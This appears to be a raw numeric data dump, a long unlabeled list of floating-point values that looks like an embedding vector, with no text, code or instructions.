0.015316457487642765, -0.014507568441331387, 0.00288353837095201, -0.028550775721669197, -0.023412832990288734, -0.008276130072772503, -0.029179910197854042, -0.004314072895795107, 0.018993904814124107, 0.048862867057323456, 0.003014608286321163, -0.02101612649857998, -0.04248163476586342, 0.009729133918881416, -0.003939587622880936, -0.028176289051771164, -0.02715768851339817, 0.006527282297611237, -0.0054749781265854836, 0.001785359694622457, -0.000935277552343905, 0.003746727481484413, 0.02216954156756401, 0.0006216459441930056, 0.026828141883015633, -0.010380738414824009, -0.0032561514526605606, 0.002701913006603718, -0.013226828537881374, -0.03214583545923233, -0.0048271180130541325, 0.014702300541102886, 0.01692674495279789, -0.018110118806362152, -0.0012049070792272687, 0.0027805548161268234, 0.0009362137643620372, -0.016013000160455704, -0.003493949770927429, -0.0049956366419792175, -0.019443286582827568, -0.01592312380671501, -0.0006782868877053261, -0.004669834394007921, -0.017840489745140076, 0.021765097975730896, -0.023472752422094345, -0.010567980818450451, -0.0027131475508213043, 0.03139686584472656, 0.009272261522710323, 0.023532669991254807, -0.02303834818303585, -0.011668968014419079, 0.003947077319025993, 0.022993410006165504, -0.05215834081172943, -0.00580078037455678, -0.008186252787709236, -0.0005064916331321001, -0.017885427922010422, 0.024086907505989075, 0.033254314213991165, 0.003510801587253809, -0.013736128807067871, 0.025854479521512985, -0.019997525960206985, -0.014178020879626274, -0.017241312190890312, 0.012814894318580627, -0.03139686584472656, 0.012365511618554592, 0.0011852466268464923, -0.016177773475646973, -0.015548638068139553, -0.015773329883813858, 0.017271270975470543, 0.018155056983232498, -0.011212095618247986, 0.0015194748993963003, 0.013713659718632698, 0.0177655927836895, 0.03142682462930679, -0.029554396867752075, 0.0033104519825428724, 0.005055554211139679, 0.012680078856647015, -0.02384723722934723, -0.013788556680083275, 0.006280121859163046, -0.02500065229833126, -0.008440903387963772, 0.013346663676202297, -0.009893907234072685, -0.0245512705296278, 0.011818762868642807, -0.015938103199005127, 0.018904028460383415, 0.006860574707388878, -0.01782551035284996, -0.009302220307290554, 0.006167776416987181, 0.033254314213991165, -0.024536291137337685, 0.01116715744137764, -0.01882913149893284, -0.01914369873702526, -0.00542255025357008, -0.0007180759566836059, 0.03310452029109001, -0.028266165405511856, 0.004415184259414673, -0.01644740253686905, -0.005242797080427408, 0.012268145568668842, 0.019578102976083755, -0.003261768724769354, -0.013219338841736317, 0.020926250144839287, 0.0047110277228057384, -0.00530271464958787, 0.010275882668793201, 0.004939463920891285, 0.0002874176134355366, -0.016746992245316505, -0.0020091147162020206, 0.010919997468590736, -0.01634254679083824, -0.024371515959501266, 0.016192752867937088, 0.04353019595146179, -0.0035276534035801888, -0.024401474744081497, 0.00300899101421237, 0.0034227974247187376, 0.012358021922409534, 0.0048495871014893055, 0.009511931799352169, 0.018514564260840416, -0.03996509313583374, 0.02911999262869358, 0.001735740341246128, 0.047994062304496765, -0.025989294052124023, -0.012365511618554592, 0.00024060693976935, -0.008358516730368137, -0.032385505735874176, 0.005748352501541376, -0.004126830492168665, -0.013219338841736317, -0.013473988510668278, -0.002024094108492136, -0.02432657778263092, -0.028715549036860466, -0.01050806324928999, -0.0014520675176754594, 0.01153415348380804, 0.000682499841786921, -0.0032861102372407913, 0.0015690942527726293, 0.03415307775139809, -0.008538269437849522, -0.004074402153491974, 0.05299719050526619, -0.020836373791098595, -0.002612036420032382, 0.00038057088386267424, -0.004984402097761631, -0.035471267998218536, -0.011384359560906887, -0.0029284765478223562, 0.0003684001276269555, 0.017750613391399384, -0.026783203706145287, 0.004872056655585766, 0.014148062095046043, -0.002155164023861289, 0.018604440614581108, -0.003737365361303091, -0.022229459136724472, -0.00870304275304079, 0.016102876514196396, -0.010919997468590736, -0.02200476825237274, -0.019488226622343063, 0.011129708960652351, 0.09814516454935074, -0.019608061760663986, 0.00801398977637291, -0.02130073495209217, 0.008321068249642849, 0.00854575913399458, -0.001988518051803112, 0.02043192833662033, -0.015743371099233627, -0.012350532226264477, 0.014387733303010464, -0.012672589160501957, -0.018155056983232498, 0.005875677801668644, 0.027247564867138863, 0.006774442736059427, -0.01972789689898491, -0.016072917729616165, 0.02847587876021862, 0.0055236611515283585, 0.015084275975823402, -0.011946087703108788, 0.018933987244963646, -0.0017170161008834839, 0.0313369482755661, -0.01824493333697319, -0.029329704120755196, -0.020087402313947678, -0.022094644606113434, -0.014582465402781963, 0.002119587967172265, 0.0030033737421035767, -0.013181889429688454, -0.006036706268787384, -0.002097118878737092, -0.001689865835942328, 0.019548144191503525, -0.0014604934258386493, -0.0307976882904768, -0.009099997580051422, -0.006283866707235575, -0.003641871502622962, -0.02741233818233013, -0.008747981861233711, 0.01569843292236328, -0.0038497110363096, 0.040174804627895355, 0.00023264912306331098, -0.0186943169683218, -0.0031737645622342825, 0.0074410270899534225, -0.016462383791804314, 0.03942583501338959, 0.00794658251106739, 0.011219585314393044, 0.024446414783596992, 0.009152425453066826, -0.007070286199450493, -0.009129956364631653, -0.014252918772399426, -0.015503699891269207, 0.01106979139149189, -0.011316952295601368, -0.00003092431143159047, 0.01673201285302639, -0.005710904020816088, -0.031876206398010254, -0.00204281834885478, -0.01599802076816559, 0.03526155650615692, 0.014073165133595467, 0.012575223110616207, -0.006845594849437475, -0.006295101251453161, 0.01914369873702526, 0.0022787442430853844, 0.008635635487735271, 0.02384723722934723, -0.015353905968368053, -0.024012010544538498, 0.031067317351698875, 0.02870056964457035, -0.0008411880698986351, 0.02819126844406128, -0.01599802076816559, 0.03696921095252037, -0.01602797955274582, -0.003254279028624296, -0.007894154638051987, -0.004909505136311054, -0.0013762342277914286, 0.016372505575418472, 0.02570468559861183, 0.007463496178388596, 0.012290614657104015, 0.02670830674469471, 0.018110118806362152, -0.001504495507106185, -0.015106745064258575, -0.016836868599057198, 0.004149299580603838, -0.01193859800696373, 0.013548885472118855, -0.010762713849544525, 0.004070657305419445, 0.009167404845356941, -0.006909257732331753, 0.013878433033823967, 0.015219091437757015, -0.013781066983938217, -0.028970198705792427, -0.03310452029109001, 0.012507815845310688, -0.006781932432204485, -0.0010626026196405292, 0.026588471606373787, 0.007976541295647621, -0.013114482164382935, -0.01799028366804123, -0.03046814166009426, -0.009294730611145496, -0.02841595932841301, 0.03705908730626106, -0.020956208929419518, 0.0005397272179834545, 0.003059546696022153, -0.0005247478256933391, -0.014589955098927021, 0.019488226622343063, 0.01917365752160549, 0.040534310042858124, 0.008688063360750675, 0.015009379014372826, -0.01533143687993288, 0.017720654606819153, -0.028985178098082542, 0.019877690821886063, 0.01097242534160614, -0.006538516841828823, -0.007976541295647621, -0.01936838962137699, 0.02107604406774044, 0.016582218930125237, -0.005152920726686716, 0.012799914926290512, 0.005078023299574852, 0.014485099352896214, 0.01063538808375597, 0.007684442680329084, 0.03169645369052887, 0.006624648813158274, -0.022768719121813774, 0.011661478318274021, 0.022798677906394005, 0.007130204234272242, 0.015713412314653397, 0.014889543876051903, -0.026438677683472633, 0.0030520567670464516, 0.0014539399417117238, 0.005272755865007639, 0.0016879934119060636, 0.006074154749512672, -0.009481973014771938, -0.0019866456277668476, 0.02979406714439392, 0.006789422128349543, -0.045028138905763626, -0.007163907866925001, -0.025929376482963562, 0.003145678201690316, -0.006134072784334421, -0.008987652137875557, 0.003357262583449483, 0.01343654002994299, -0.019233575090765953, -0.0004821500915568322, 0.024056948721408844, 0.02011736109852791, -0.03388344869017601, 0.011639009229838848, 0.014455140568315983, 0.011466746218502522, 0.015264029614627361, 0.011586581356823444, -0.025494974106550217, -0.0000797537068137899, 0.001969793811440468, -0.02950945869088173, 0.011092260479927063, 0.011781314387917519, 0.05356640741229057, -0.011991025879979134, -0.015878185629844666, -0.001739485189318657, -0.013608803041279316, -0.020971188321709633, -0.020716538652777672, -0.02169020101428032, 0.015878185629844666, 0.00526901101693511, 0.0031512954737991095, -0.007669463288038969, 0.005231562536209822, -0.005081768147647381, -0.02998879924416542, -0.009893907234072685, 0.0027768099680542946, 0.0036119127180427313, -0.005254031624644995, -0.013106992468237877, 0.014297856949269772, 0.016102876514196396, -0.018574481830000877, -0.004913249984383583, 0.010837610810995102, 0.004115595947951078, -0.029105013236403465, 0.013316704891622066, -0.007691932376474142, 0.014732260257005692, 0.028041474521160126, 0.006212714593857527, 0.008733002468943596, 0.00825366098433733, 0.012777445837855339, 0.03460245952010155, -0.03616032004356384, -0.00408563669770956, 0.011084770783782005, -0.031486742198467255, -0.0122756352648139, -0.02261892519891262, 0.007085265591740608, -0.007590821012854576, -0.006905512884259224, 0.02458122931420803, -0.005527405999600887, -0.014522547833621502, -0.003872180124744773, 0.013346663676202297, 0.006987899541854858, -0.009699174202978611, 0.01721135340631008, -0.004284114111214876, -0.00028624734841287136, -0.001314444118179381, -0.018125098198652267, -0.011152178049087524, 0.01306205429136753, -0.0072949775494635105, 0.012230697087943554, 0.011564112268388271, -0.00580078037455678, -0.009077528491616249, 0.020986167713999748, 0.014844605699181557, -0.008201232179999352, 0.027217606082558632, 0.014956951141357422, 0.011691437102854252, -0.02348773181438446, -0.007276253309100866, 0.0029584355652332306, -0.025509953498840332, 0.02143554948270321, -0.0008402518578805029, -0.014889543876051903, 0.008096376433968544, 0.011818762868642807, 0.024925755336880684, -0.000804207636974752, 0.006841850001364946, -0.00042621130705811083, -0.00975160300731659, 0.005025595426559448, 0.026019252836704254, -0.020357031375169754, 0.0005827930872328579, 0.0024285383988171816, -0.024476373568177223, 0.06836607307195663, -0.018619420006871223, -0.020327072590589523, -0.009489462710916996, -0.05030089244246483, -0.023502711206674576, -0.01905382238328457, -0.016971683129668236, 0.0005083640571683645, 0.0016786312917247415, 0.012253166176378727, -0.011616540141403675, -0.022933492437005043, 0.048443444073200226, 0.005224072840064764, -0.015271519310772419, 0.015878185629844666, 0.0011103495489805937, 0.01237300131469965, 0.013054564595222473, 0.04904262349009514, 0.015271519310772419, -0.0007583331316709518, -0.019518185406923294, 0.009234813041985035, -0.0038572007324546576, -0.02497069351375103, 0.008965183049440384, -0.03292476758360863, 0.008036458864808083, 0.001283549121581018, -0.014110613614320755, -0.01894896663725376, -0.00835102703422308, -0.014515058137476444, -0.005913126282393932, -0.008455882780253887, -0.009714153595268726, 0.006321315187960863, 0.004628641065210104, -0.025494974106550217, -0.007804277818650007, -0.020671600475907326, -0.020057443529367447, 0.006523537449538708, 0.011511684395372868, 0.005879422649741173, 0.0027861720882356167, -0.018364768475294113, 0.02178007736802101, 0.013728639110922813, 0.02110600285232067, -0.0004351053503341973, 0.01293472945690155, -0.007238804828375578, 0.019667979329824448, 0.011219585314393044, -0.010897528380155563, -0.0122756352648139, -0.02387719601392746, 0.03831735625863075, -0.0023349171970039606, 0.008972672745585442, 0.004531274549663067, -0.004875801503658295, -0.013608803041279316, 0.003750472329556942, 0.009938845410943031, -0.029449541121721268, -0.016642136499285698, -0.0034040731843560934, -0.002685061190277338, 0.03388344869017601, -0.0003606763493735343, -0.0034471391700208187, 0.010186005383729935, 0.029809046536684036, 0.015788309276103973, -0.024476373568177223, -0.015983041375875473, -0.0011637137504294515, -0.025524932891130447, -0.008073907345533371, 0.011691437102854252, -0.014852095395326614, 0.0204019695520401, 0.010905018076300621, 0.01695670373737812, -0.02158534526824951, -0.005958064459264278, 0.01346649881452322, 0.013796046376228333, 0.009699174202978611, -0.01586320623755455, 0.0009071911335922778, 0.01808016002178192, -0.004025719128549099, -0.005478722974658012, 0.0411934070289135, 0.008388475514948368, -0.011961067095398903, -0.005239052232354879, -0.0027449787594377995, -0.03654978424310684, 0.006055430509150028, -0.009025100618600845, 0.015069296583533287, -0.004430163651704788, 0.00003229937647120096, 0.012260655872523785, 0.002449135296046734, 0.014260408468544483, 0.017046580091118813, 0.021869953721761703, 0.0013415943831205368, -0.017930366098880768, -0.005557364784181118, -0.021600324660539627, 0.013196868821978569, 0.006036706268787384, -0.005579833872616291, 0.011414318345487118, 0.009721643291413784, 0.024925755336880684, 0.007654483895748854, -0.0028816659469157457, 0.000560323940590024, 0.035860732197761536, -0.01863439939916134, 0.007864195853471756, 0.0015531786484643817, 0.0034920773468911648, -0.03214583545923233, -0.03262517601251602, -0.010298351757228374, -0.0017001641681417823, 0.010792672634124756, 0.008792920038104057, -0.019458267837762833, 0.020282134413719177, -0.006785677280277014, -0.017480984330177307, -0.01562353502959013, 0.010418186895549297, -0.017166415229439735, 0.011946087703108788, -0.004651110153645277, -0.019038842990994453, -0.004505060613155365, 0.0028442174661904573, 0.008747981861233711, 0.021135961636900902, -0.0022038472816348076, -0.005613537970930338, 0.002552118618041277, -0.012073412537574768, -0.010335800237953663, -0.01393086090683937, -0.013136951252818108, 0.022888554260134697, -0.007639504503458738, -0.014425181783735752, -0.0067969118244946, -0.018454646691679955, -0.014260408468544483, -0.030303366482257843, -0.01824493333697319, -0.01972789689898491, 0.0016645881114527583, 0.020132340490818024, 0.01044065598398447, 0.0059318505227565765, 0.005160410422831774, 0.001061666407622397, -0.010710285045206547, 0.007954072207212448, -0.0009282559622079134, -0.017555881291627884, 0.011661478318274021, 0.0038384764920920134, -0.02670830674469471, 0.03750846907496452, 0.006650862749665976, 0.015196621417999268, 0.014200489968061447, -0.015728391706943512, 0.0050443196669220924, 0.008845347911119461, -0.006527282297611237, 0.02423670142889023, -0.011257034726440907, 0.018799172714352608, 0.0017039090162143111, -0.011152178049087524, -0.02741233818233013, -0.014545016922056675, -0.012447898276150227, 0.0010410697432234883, -0.025255301967263222, 0.014762219041585922, 0.004074402153491974, -0.01992262899875641, 0.011706416495144367, -0.004643620457500219, 0.011953577399253845, -0.0036362542305141687, 0.008126335218548775, 0.011818762868642807, 0.019413327798247337, 0.012110861018300056, 0.0155935762450099, 0.004759710747748613, 0.00039414598722942173, 0.02841595932841301, 0.01917365752160549, 0.015226581133902073, 0.02091127075254917, -0.0023124481085687876, -0.010710285045206547, -0.0009624277590774, -0.009504442103207111, 0.00794658251106739, 0.0030033737421035767, 0.009676705114543438, -0.004935719072818756, -0.020836373791098595, 0.018963946029543877, 0.008650614880025387, -0.01936838962137699, -0.0025951846037060022, -0.0065534962341189384, -0.011803783476352692, -0.006441150791943073, 0.004669834394007921, 0.00854575913399458, -0.012073412537574768, 0.00007320021541090682, 0.006115348543971777, -0.001463302061893046, 0.013039585202932358, 0.01580328866839409, 0.0006300718523561954, -0.023967072367668152, -0.006261397618800402, -0.004482591524720192, 0.007160163018852472, 0.006736994255334139, -0.012140819802880287, -0.010523042641580105, 0.014005757868289948, 0.0025970570277422667, -0.012425429187715054, -0.013743618503212929, 0.011781314387917519, 0.007871685549616814, 0.008193742483854294, -0.025659747421741486, 0.007313701789826155, -0.007834237068891525, 0.001215205411426723, -0.01686682738363743, -0.004096871241927147, 0.01602797955274582, 0.01628262922167778, -0.007186376955360174, -0.004115595947951078, -0.012455387972295284, -0.011511684395372868, 0.0020184768363833427, -0.0034808428026735783, 0.004722262267023325, 0.0077518499456346035, -0.019158678129315376, -0.011384359560906887, 0.00017729548562783748, -0.012552754022181034, 0.0006375615485012531, 0.0033460280392318964, 0.006246418226510286, -0.0026625918690115213, -0.009496952407062054, 0.02471604384481907, -0.007864195853471756, -0.0016739502316340804, 0.017061559483408928, -0.0021046085748821497, 0.011429297737777233, -0.002973414957523346, -0.004943208768963814, 0.0030258428305387497, 0.004523784853518009, -0.00021802078117616475, -0.006995389237999916, -0.007414813153445721, -0.0029846495017409325, 0.015279009006917477, -0.01969793811440468, 0.010448145680129528, 0.016492342576384544, 0.009332179091870785, 0.01390090212225914, -0.0027225096710026264, 0.005782056134194136, -0.010305841453373432, -0.0311871524900198, 0.024116866290569305, -0.02127077616751194, -0.014230449683964252, 0.001988518051803112, 0.003462118562310934, 0.042811181396245956, -0.01562353502959013, 0.002964052837342024, 0.0017479110974818468, -0.016911765560507774, -0.010118598118424416, -0.011257034726440907, -0.009759092703461647, 0.005048064514994621, -0.0034040731843560934, 0.012215716764330864, -0.002937838900834322, -0.007429792545735836, -0.02889530174434185, 0.006729504559189081, 0.03024344891309738, -0.017555881291627884, -0.015728391706943512, -0.02011736109852791, 0.020446909591555595, 0.0055236611515283585, -0.002398579614236951, -0.010395717807114124, -0.005448764190077782, -0.015818268060684204, 0.007257529068738222, -0.0051416861824691296, -0.009886417537927628, -0.02258896641433239, 0.014837116003036499, 0.00029748192173428833, -0.006969175301492214, 0.024671105667948723, 0.0020896291825920343, 0.006310080643743277, 0.004714772570878267, -0.027037853375077248, 0.015578596852719784, 0.0035688469652086496, 0.00009882906306302175, -0.0030932503286749125, 0.019877690821886063, 0.005587323568761349, -0.00025792690576054156, 0.03834731504321098, -0.0028348553460091352, -0.021420570090413094, 0.010530532337725163, 0.010448145680129528, -0.014163041487336159, 0.005370122380554676, -0.013189379125833511, 0.0023068308364599943, -0.017570860683918, 0.003845966188237071, 0.018005263060331345, 0.0025408840738236904, 0.0015307095600292087, 0.012799914926290512, 0.014455140568315983, 0.013758597895503044, -0.0067444839514791965, 0.01715143583714962, 0.003973291255533695, -0.008455882780253887, 0.0006174329901114106, -0.005036829970777035, 0.004684813786298037, -0.016162794083356857, 0.018259912729263306, -0.00009520123421680182, -0.02107604406774044, 0.008942713961005211, 0.011369380168616772, -0.00045031882473267615, -0.013084523379802704, 0.006268887314945459, 0.009833989664912224, 0.0061265830881893635, -0.010964935645461082, -0.000024868179025361314, -0.020267155021429062, 0.005104237236082554, -0.027951598167419434, -0.013279256410896778, 0.00047021335922181606, -0.004774690140038729, -0.00027594901621341705, -0.008261150680482388, 0.0011646499624475837, 0.004572467878460884, 0.006751973647624254, -0.019937608391046524, -0.0073174466378986835, -0.03433283045887947, 0.006785677280277014, -0.005916871130466461, 0.004314072895795107, 0.003789793234318495, 0.019293492659926414, -0.0245512705296278, 0.02368246391415596, 0.012328063137829304, 0.006853084545582533, -0.03648986667394638, -0.012545264326035976, 0.011264524422585964, 0.009519421495497227, 0.0009142127237282693, 0.011579091660678387, 0.0010148556903004646, 0.026109129190444946, 0.02892526052892208, -0.007617035415023565, -0.0020259665325284004, 0.0004966614069417119, 0.01300213672220707, 0.012260655872523785, 0.0034134353045374155, 0.006407447159290314, -0.023188142105937004, 0.012103371322154999, -0.005778311286121607, -0.0018106374191120267, 0.007553372532129288, 0.017106497660279274, -0.007879175245761871, 0.020252175629138947, 0.007130204234272242, 0.0017507197335362434, 0.012612671591341496, 0.019877690821886063, -0.025689706206321716, -0.002864814130589366, 0.01489703357219696, -0.01766073703765869, -0.01377357728779316, -0.017046580091118813, 0.00026939550298266113, -0.0034508840180933475, 0.025989294052124023, 0.01580328866839409, -0.007602055557072163, -0.000023654025426367298, 0.0018714913167059422, 0.007309956941753626, -0.022484110668301582, 0.000786419550422579, -0.015084275975823402, 0.03205595910549164, 0.0060479408130049706, 0.002078394638374448, -0.008942713961005211, -0.01583324745297432, 0.007568351924419403, -0.024371515959501266, 0.03786797448992729, -0.017735633999109268, 0.026977935805916786, -0.010238434188067913, 0.019578102976083755, -0.015001889318227768, -0.004939463920891285, 0.02143554948270321, -0.005358887370675802, 0.0016318205744028091, -0.0034321597777307034, -0.002851707162335515, -0.02416180446743965, -0.0007152673206292093, 0.011286993511021137, 0.020836373791098595, 0.043200649321079254, -0.0005205348716117442, -0.003711151424795389, -0.003992015495896339, -0.012799914926290512, -0.011661478318274021, -0.00455374363809824, -0.009309710003435612, -0.0023929623421281576, 0.032774969935417175, 0.0008599123684689403, 0.017495963722467422, -0.016642136499285698, 0.005482467822730541, -0.01917365752160549, -0.004119340796023607, 0.001969793811440468, -0.009886417537927628, -0.004894525744020939, -0.0077293808571994305, 0.0007110543665476143, 0.04532772675156593, -0.0023555138614028692, -0.009234813041985035, 0.0029209868516772985, 0.006257652770727873, 0.005527405999600887, 0.004332797136157751, -0.0027992790564894676, -0.022214479744434357, 0.002363003557547927, -0.0024004520382732153, -0.0060479408130049706, -0.031067317351698875, 0.0005734309088438749, -0.003641871502622962, -0.014380243606865406, 0.020087402313947678, -0.02577958256006241, 0.010283372364938259, 0.009287240915000439, 0.013047074899077415, 0.008852837607264519, -0.002490328624844551, 0.01336913276463747, 0.011144688352942467, -0.0010494956513866782, -0.017061559483408928, 0.020416948944330215, -0.037178922444581985, -0.004119340796023607, 0.0022394233383238316, -0.011391849257051945, -0.016776951029896736, -0.00676695303991437, 0.028655631467700005, -0.012028474360704422, 0.0002424793638056144, -0.005875677801668644, -0.01446263026446104, -0.013451519422233105, 0.00554987508803606, -0.01034328993409872, 0.005606047809123993, -0.02664838917553425, 0.014207979664206505, 0.0021383122075349092, 0.003789793234318495, -0.0061715212650597095, -0.022244438529014587, -0.004411439411342144, -0.010268392972648144, -0.01827489212155342, -0.008246171288192272, -0.0035988057497888803, -0.008298599161207676, 0.022573987022042274, -0.005853208247572184, 0.007175142411142588, 0.01843966543674469, 0.0023854726459831, 0.007654483895748854, -0.004381480626761913, 0.017690695822238922, -0.006238928530365229, 0.006751973647624254, -0.012859832495450974, 0.003872180124744773, 0.0034227974247187376, 0.0005041511030867696, -0.009212343022227287, 0.021989788860082626, 0.009407076053321362, 0.011107239872217178, -0.013406581245362759, -0.03076772950589657, -0.004842097405344248, 0.021795056760311127, 0.013826005160808563, 0.00009461610170546919, -0.019353410229086876, 0.002934094052761793, -0.0047110277228057384, -0.007575841620564461, -0.0012189503759145737, -0.028011515736579895, 0.007392344065010548, -0.007871685549616814, -0.005295224953442812, 0.009631766937673092, 0.01992262899875641, -0.019638020545244217, 0.005725883413106203, 0.009983783587813377, -0.002887283219024539, -0.02558485046029091, 0.02959933504462242, 0.014747239649295807, 0.009759092703461647, -0.004310328047722578, 0.002589567331597209, 0.009961314499378204, -0.017016621306538582, -0.0099088866263628, 0.024206742644309998, -0.0017451024614274502, 0.00279178936034441, -0.0045162951573729515, 0.004197982605546713, 0.0004124021506868303, 0.044938262552022934, 0.0328948050737381, -0.0024098141584545374, 0.0039433324709534645, 0.01060542929917574, 0.00794658251106739, 0.009429545141756535, -0.001400575740262866, 0.004190492909401655, -0.00331794167868793, 0.031456783413887024, -0.0025109252892434597, 0.02085135318338871, -0.006740739103406668, -0.006564730778336525, -0.010695305652916431, 0.004935719072818756, 0.0064186817035079, -0.0034808428026735783, -0.008852837607264519, 0.015773329883813858, 0.0045387642458081245, 0.009983783587813377, -0.002458497416228056, -0.027277523651719093, -0.009452014230191708, 0.012747487053275108, 0.023053327575325966, 0.005048064514994621, 0.0002787576522678137, 0.0019145571859553456, 0.009759092703461647, -0.0022843615151941776, 0.02085135318338871, -0.011272014118731022, -0.006845594849437475, -0.017466004937887192, -0.004943208768963814, -0.0007826747023500502, 0.020312093198299408, 0.021765097975730896, -0.03559110313653946, 0.01589316502213478, 0.0024922010488808155, -0.014342795126140118, -0.00732868118211627, -0.003580081509426236, -0.007044072262942791, -0.005489957518875599, -0.0015344544081017375, -0.009332179091870785, -0.019383369013667107, -0.018799172714352608, 0.0017881683306768537, 0.00455374363809824, 0.0028367277700453997, -0.004209217149764299, 0.014043206349015236, 0.012313083745539188, -0.03292476758360863, -0.010710285045206547, -0.027082791551947594, -0.001233929768204689, -0.0007124586845748127, 0.005381356924772263, 0.017436044290661812, -0.012957198545336723, -0.011511684395372868, -0.005403826013207436, -0.00009327029692940414, 0.00558357872068882, -0.007714401464909315, -0.02867061085999012, -0.03439274802803993, -0.005467488430440426, -0.0069841546937823296, -0.020581724122166634, -0.0038834146689623594, 0.006778187584131956, 0.011706416495144367, 0.0038384764920920134, 0.010762713849544525, 0.003280492965131998, -0.0093471584841609, -0.00888279639184475, -0.006089134141802788, -0.016462383791804314, -0.01390090212225914, 0.006044195964932442, -0.02326303906738758, -0.014020737260580063, -0.01631258800625801, -0.02645365707576275, 0.007841726765036583, -0.0034546288661658764, 0.016387484967708588, -0.0017628904897719622, -0.009362137876451015, -0.02172015979886055, 0.012485346756875515, -0.0093471584841609, 0.01689678616821766, -0.0009830244816839695, -0.0017844234826043248, -0.00748222041875124, 0.009863948449492455, -0.014402712695300579, -0.001595308305695653, -0.01533143687993288, -0.011204605922102928, 0.011923618614673615, 0.0002139248390449211, -0.009227323345839977, 0.0016973555320873857, 0.028910281136631966, 0.010485594160854816, 0.007789298426359892, 0.01436526421457529, 0.02760707214474678, -0.013811025768518448, 0.002589567331597209, 0.007459751330316067, 0.0034902049228549004, -0.02264888398349285, 0.007609545718878508, -0.014222959987819195, -0.002969670109450817, 0.006871809251606464, -0.0011552878422662616, 0.00570341432467103, -0.020536785945296288, -0.019428307190537453, -0.0273823793977499, -0.012687568552792072, -0.017451023682951927, 0.011683947406709194, 0.004370246082544327, 0.028520816937088966, -0.007766829337924719, 0.008058927953243256, 0.0037523447535932064, 0.019158678129315376, 0.008852837607264519, 0.0013378494186326861, 0.030273407697677612, -0.0006384977605193853, 0.018978925421833992, 0.001617777394130826, -0.010620408691465855, -0.01399826817214489, 0.009624277241528034, -0.010335800237953663, 0.00984896905720234, -0.017451023682951927, -0.0073736198246479034, 0.004130575340241194, 0.00019988164422102273, 0.0004568723088596016, 0.023083286359906197, -0.017106497660279274, -0.015683453530073166, -0.005467488430440426, -0.007886664941906929, 0.019847732037305832, 0.00975160300731659, -0.004040698520839214, -0.002119587967172265, -0.0076994220726192, -0.00576707674190402, -0.0011421807575970888, -0.002926604123786092, 0.018155056983232498, 0.00002182548269047402, -0.024641146883368492, -0.010163536295294762, -0.034452665597200394, 0.028266165405511856, 0.012919750064611435, 0.005265266168862581, -0.006519792601466179, 0.01041069719940424, 0.0049956366419792175, -0.0032861102372407913, -0.013623782433569431, -0.023532669991254807, 0.011032342910766602, -0.014515058137476444, -0.0038253695238381624, -0.006519792601466179, 0.017750613391399384, 0.0012872939696535468, -0.004621151369065046, -0.0014670470263808966, 0.015938103199005127, -0.002333044772967696, 0.02255900762975216, 0.014200489968061447, -0.0016205860301852226, -0.0029940116219222546, 0.011384359560906887, -0.013788556680083275, -0.007238804828375578, -0.021630283445119858, 0.008066417649388313, 0.023952092975378036, -0.0037972829304635525, -0.02783176302909851, 0.0011150306090712547, 0.012088391929864883, 0.012148309499025345, 0.01709151826798916, -0.00350705673918128, -0.0010635388316586614, -0.007654483895748854, 0.015114234760403633, 0.0067220148630440235, -0.004475101828575134, 0.008800409734249115, -0.011024853214621544, 0.008066417649388313, -0.018799172714352608, -0.008890286087989807, -0.009392096661031246, -0.005340163130313158, -0.02213958278298378, 0.01050806324928999, -0.024206742644309998, -0.015728391706943512, -0.008628145791590214, 0.008538269437849522, -0.00040608271956443787, 0.0032692584209144115, -0.021929871290922165, 0.013878433033823967, 0.004872056655585766, 0.02284361608326435, -0.03226567059755325, -0.00031737645622342825, -0.011032342910766602, -0.021735139191150665, 0.01106979139149189, 0.005456253886222839, -0.0046174065209925175, -0.00038969898014329374, -0.005613537970930338, -0.0119086392223835, -0.0008617847925052047, -0.020476868376135826, -0.020072422921657562, 0.010358269326388836, -0.01240296009927988, 0.000181859519216232, 0.005602302961051464, -0.011751355603337288, -0.02676822431385517, -0.010800162330269814, -0.001771316397935152, -0.030453162267804146, 0.0012049070792272687, 0.0028797935228794813, 0.004149299580603838, -0.0009886417537927628, -0.003379731671884656, -0.02998879924416542, 0.006306335795670748, 0.019877690821886063, 0.0005177262355573475, 0.015758350491523743, -0.009339668788015842, -0.009429545141756535, 0.0067444839514791965, 0.006673331838101149, -0.019218595698475838, -0.0017282506451010704, 0.020072422921657562, -0.014762219041585922, -0.000015081818673934322, -0.01203596405684948, -0.005411315709352493, -0.003939587622880936, 0.03559110313653946, 0.017885427922010422, 0.016522301360964775, 0.013219338841736317, -0.0033684971276670694, -0.013181889429688454, 0.010358269326388836, -0.0001834979047998786, -0.01625267043709755, 0.01237300131469965, -0.0041605341248214245, 0.010470614768564701, -0.012050943449139595, -0.00891275517642498, -0.006999134086072445, 0.003514546435326338, 0.02500065229833126, 0.000379634671844542, -0.0012947836657986045, 0.008515800349414349, 0.016582218930125237, 0.012447898276150227, -0.02760707214474678, -0.005935595370829105, -0.01562353502959013, 0.009309710003435612, 0.015458761714398861, 0.0021607812959700823, -0.00470728287473321, 0.0034508840180933475, -0.01053802203387022, 0.002638250356540084, 0.008800409734249115, -0.01709151826798916, -0.005104237236082554, 0.014440161176025867, 0.009092507883906364, -0.016207732260227203, 0.02110600285232067, -0.0005214710836298764, 0.007096500135958195, 0.012095881626009941, 0.009392096661031246, 0.01512172445654869, -0.001790040754713118, 0.029164930805563927, -0.009646746329963207, -0.011833742260932922, -0.0014679832383990288, -0.0007672272040508687, -0.025794561952352524, 0.017705675214529037, -0.003357262583449483, -0.020446909591555595, -0.0003122272901237011, 0.021405590698122978, 0.03478221222758293, 0.004040698520839214, -0.021645262837409973, 0.012260655872523785, 0.012155799195170403, 0.02233431488275528, -0.014065675437450409, 0.01563851535320282, -0.00003794591248151846, 0.014724770560860634, -0.003645616350695491, 0.0093471584841609, 0.002520287409424782, -0.010148556903004646, -0.006632138509303331, 0.008837858214974403, 0.017046580091118813, -0.009182384237647057, -0.011182136833667755, 0.02413184568285942, 0.024461394175887108, 0.012455387972295284, 0.027622051537036896, 0.000895020377356559, -0.027232585474848747, -0.004658599849790335, 0.034572500735521317, 0.0004531274607870728, -0.007074031047523022, -0.013960819691419601, 0.010515552945435047, -0.008568228222429752, 0.007691932376474142, 0.005725883413106203, -0.01805020123720169, -0.013316704891622066, 0.006673331838101149, -0.0026625918690115213, -0.00005263276761979796, 0.0049544433131814, 0.014470119960606098, -0.007834237068891525, 0.022858595475554466, 0.006092878989875317, 0.005107982084155083, 0.004287858959287405, -0.008733002468943596, 0.015653494745492935, 0.005553619936108589, -0.028146330267190933, -0.0036568508949130774, 0.015076786279678345, 0.009129956364631653, 0.006609669420868158, -0.026408717036247253, -0.0042541553266346455, -0.0000014043206419955823, -0.006501068361103535, 0.0009090635576285422, 